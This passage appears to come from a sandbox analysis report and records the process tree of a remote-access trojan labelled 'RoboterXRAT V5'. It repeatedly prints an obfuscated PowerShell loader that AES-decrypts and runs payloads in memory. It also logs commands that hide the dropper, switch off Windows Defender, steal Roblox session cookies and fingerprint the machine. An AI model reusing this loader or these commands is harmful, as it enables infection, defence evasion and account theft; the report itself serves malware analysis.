$bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        17⤵
        
        PID:1572
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        16⤵
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        17⤵
        
        PID:1860
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        18⤵
        
        PID:2884
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        19⤵
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        19⤵
        
        PID:1840
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        19⤵
        
        PID:1224
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        18⤵
        
        PID:2744
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        18⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        17⤵
        
        PID:1700
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        17⤵
        
        PID:2224
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        15⤵
        
        PID:2608
        
        C:\Windows\system32\net.exe
        
        net file
        16⤵
        
        PID:2156
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        17⤵
        
        PID:1156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:664
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        15⤵
        
        PID:2700
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        14⤵
        
        PID:1588
        
        C:\Windows\system32\net.exe
        
        net file
        15⤵
        
        PID:1760
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        16⤵
        
        PID:3016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        14⤵
        
        PID:852
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        15⤵
        
        PID:2792
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        16⤵
        
        PID:1648
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        17⤵
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        18⤵
        
        PID:1428
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        18⤵
        
        PID:2716
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        18⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        17⤵
        
        PID:1432
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        17⤵
        
        PID:2244
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        16⤵
        
        PID:2952
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        16⤵
        
        PID:1580
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        15⤵
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        15⤵
        
        PID:1956
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        13⤵
        
        PID:1676
        
        C:\Windows\system32\net.exe
        
        net file
        14⤵
        
        PID:892
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        15⤵
        
        PID:1700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        13⤵
        
        PID:1792
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        12⤵
        
        PID:2268
        
        C:\Windows\system32\net.exe
        
        net file
        13⤵
        
        PID:2552
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        14⤵
        
        PID:1904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2752
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        12⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        13⤵
        
        PID:1780
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        14⤵
        
        PID:2832
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        15⤵
        
        PID:1848
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        16⤵
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        17⤵
        
        PID:2960
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        17⤵
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        17⤵
        
        PID:1516
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        16⤵
        
        PID:3000
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        16⤵
        
        PID:2772
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        17⤵
        
        PID:2032
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        17⤵
        Views/modifies file attributes
        
        PID:2768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        17⤵
        
        PID:776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        17⤵
        
        PID:2756
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        17⤵
        
        PID:1608
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        17⤵
        
        PID:2852
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        17⤵
        
        PID:2960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2740
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        17⤵
        Detects videocard installed
        
        PID:3064
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1500
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1432
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        15⤵
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        15⤵
        
        PID:2776
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        14⤵
        
        PID:2040
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        14⤵
        
        PID:2716
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        13⤵
        
        PID:1908
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        13⤵
        
        PID:676
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        11⤵
        
        PID:264
        
        C:\Windows\system32\net.exe
        
        net file
        12⤵
        
        PID:352
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        13⤵
        
        PID:1156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:776
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        11⤵
        
        PID:2824
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        10⤵
        
        PID:2148
        
        C:\Windows\system32\net.exe
        
        net file
        11⤵
        
        PID:1968
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        12⤵
        
        PID:1964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        11⤵
        
        PID:2604
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        10⤵
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        11⤵
        
        PID:1044
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        12⤵
        
        PID:392
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        12⤵
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        12⤵
        
        PID:1308
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        11⤵
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        11⤵
        
        PID:1840
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        9⤵
        
        PID:2236
        
        C:\Windows\system32\net.exe
        
        net file
        10⤵
        
        PID:3028
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        11⤵
        
        PID:2348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { 